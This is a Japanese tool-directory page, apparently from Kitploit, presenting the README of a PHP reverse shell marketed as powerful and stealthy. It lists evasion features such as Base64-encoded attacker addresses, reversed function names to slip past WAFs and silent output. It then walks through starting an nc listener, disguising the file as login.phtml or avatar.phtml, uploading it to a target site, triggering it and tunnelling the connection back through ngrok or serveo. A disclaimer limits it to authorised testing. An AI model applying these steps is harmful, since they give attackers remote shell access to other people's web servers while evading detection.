Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitLabGitLab/s_r_e_e_r_a_j/php-reverse-shell
ペイロード生成IDS/IPS回避ウェブアプリケーション悪用WAFバイパスペネトレーションテストコマンド&コントロール学習と教育レッドチーミングリモートアクセスツール
GitLabs_r_e_e_r_a_j/php-reverse-shell

PHP-REVERSE-SHELL

これは、倫理的なハッキングやペネトレーションテストのために設計された、パワフルでステルス性の高いPHPリバースシェルです。信頼性が高く、静かにあなたのマシンへの接続を確立します。

111ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る

PHP リバースシェル (強力かつステルス性)

これは、倫理的なハッキングや侵入テスト向けに設計された、強力かつステルス性の高い PHP リバースシェルです。 マシンへの信頼性が高く静かな接続を確立します。

⚠️ 免責事項

この PHP リバースシェルは、教育目的および許可された侵入テストの目的にのみ使用するために開発されています。
開発者は、この reverse_shell を使用して行われたいかなる誤用、損害、または違法行為についても責任を負いません。
責任を持って使用し、自分が所有しているか、テストする明示的な許可があるシステムでのみ使用してください。不正アクセスは違法であり、法律で罰せられます。

特徴

  • IP およびシェルコマンドはステルス性のため Base64 エンコードされます

  • 関数名が逆順になり、WAF やセキュリティフィルターをバイパスします

  • サイレントモード — 検出を避けるため出力を表示しない

  • 接続が切れた場合に自動的に再接続します

  • バックグラウンドデーモンとして実行可能(サーバーがサポートしている場合)

  • ほとんどの PHP 対応サーバーで動作します

  • Ngrok、Serveo などのトンネリングサービスをサポート

  • 一部のフィルターをバイパスするために .phtml 拡張子でアップロード

使用方法

1. マシン上でリスナーを起動

root@kitploit:~
nc -lvnp 4444

2. IP またはホスト名を Base64 でエンコード

以下の簡単なコマンドを使用します:

root@kitploit:~
echo "your_ip_or_hostname" | base64

例:

root@kitploit:~
echo "192.168.1.5" | base64

出力をコピーし、PHP リバースシェルスクリプト内の $ip_b64 値を置き換えてください。

3. PHP リバースシェルスクリプトを更新:

これらの行を、Base64 エンコードされた IP/ホスト名とポートに変更します:

root@kitploit:~
$ip_b64 = 'YOUR_BASE64_ENCODED_IP_OR_HOSTNAME';
$port = YOUR_LISTENER_PORT;

4. ファイル名を変更してアップロード

ファイルをより疑われにくい名前に変更します。例:

  • login.phtml

  • avatar.phtml

  • update.phtml

.phtml 拡張子を使用すると、.php をブロックする一部のサーバーでファイルが実行されるのに役立ちます。

このファイルを、ファイルアップロードが許可されているターゲットウェブサイトにアップロードします。

5. リバースシェルを起動

アップロードしたファイルをブラウザで開きます:

root@kitploit:~
http://target.com/uploads/login.phtml

開かれると、リスナーがリバースシェル接続を受け取ります。

トンネリングの使用(IP がパブリックでない場合)

モバイルデータを使用している場合やルーター(NAT)の背後にいる場合、IP がパブリックでない可能性があります。 その場合、リバースシェルは直接マシンに到達できません。

これを解決するには、Ngrok や Serveo などの TCP トンネリングツールを使用します。

Ngrok(推奨)

Ngrok をインストール
以下のコマンドを実行:

root@kitploit:~
ngrok tcp 4444

次のように表示されます:

root@kitploit:~
Forwarding tcp://4.tcp.ngrok.io:18900

PHP リバースシェルスクリプトを更新:

root@kitploit:~
$ip_b64 = base64_encoded of 4.tcp.ngrok.io;
$port = 18900;

リスナーを起動:

root@kitploit:~
nc -lvnp 4444

Serveo

以下のコマンドを実行:

root@kitploit:~
ssh -R 0:localhost:4444 serveo.net

次のように表示されます:

root@kitploit:~
Forwarding TCP connections from serveo.net:46603

PHP リバースシェルスクリプトを更新:

root@kitploit:~
$ip_b64 = base64_encoded of serveo.net;
$port = 46603;

リスナーを起動:

root@kitploit:~
nc -lvnp 4444

ライセンス

このプロジェクトは GNU General Public License v3.0 の下でライセンスされています。

ツールをダウンロード